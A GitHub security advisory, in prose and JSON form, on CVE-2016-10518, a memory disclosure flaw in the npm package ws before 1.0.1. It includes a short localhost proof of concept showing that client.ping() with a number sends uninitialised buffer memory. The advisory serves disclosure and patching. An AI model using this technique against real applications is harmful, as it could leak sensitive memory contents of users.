ghsa-2mhh-w6q8-5hxw
Vulnerability from github
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
Proof of Concept
``` var ws = require('ws')
var server = new ws.Server({ port: 9000 }) var client = new ws('ws://localhost:9000')
client.on('open', function () { console.log('open') client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) { console.log('got pong') console.log(data) // Data from the client. }) }) ```
Recommendation
Update to version 1.0.1 or greater.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ws"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10518"
],
"database_specific": {
"cwe_ids": [
"CWE-201"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T20:52:34Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "Versions of `ws` prior to 1.0.1 are affected by a remote memory disclosure vulnerability.\n\nIn certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause `ws` to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.\n\n\n\n## Proof of Concept\n```\nvar ws = require(\u0027ws\u0027)\n\nvar server = new ws.Server({ port: 9000 })\nvar client = new ws(\u0027ws://localhost:9000\u0027)\n\nclient.on(\u0027open\u0027, function () {\n console.log(\u0027open\u0027)\n client.ping(50) // this sends a non-zeroed buffer of 50 bytes\n\n client.on(\u0027pong\u0027, function (data) {\n console.log(\u0027got pong\u0027)\n console.log(data) // Data from the client. \n })\n})\n```\n\n\n## Recommendation\n\nUpdate to version 1.0.1 or greater.",
"id": "GHSA-2mhh-w6q8-5hxw",
"modified": "2020-08-31T18:09:55Z",
"published": "2019-02-18T23:56:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10518"
},
{
"type": "WEB",
"url": "https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795"
},
{
"type": "WEB",
"url": "https://gist.github.com/c0nrad/e92005446c480707a74a"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-2mhh-w6q8-5hxw"
},
{
"type": "WEB",
"url": "https://github.com/websockets/ws/releases/tag/1.0.1"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/67"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Remote Memory Disclosure in ws"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.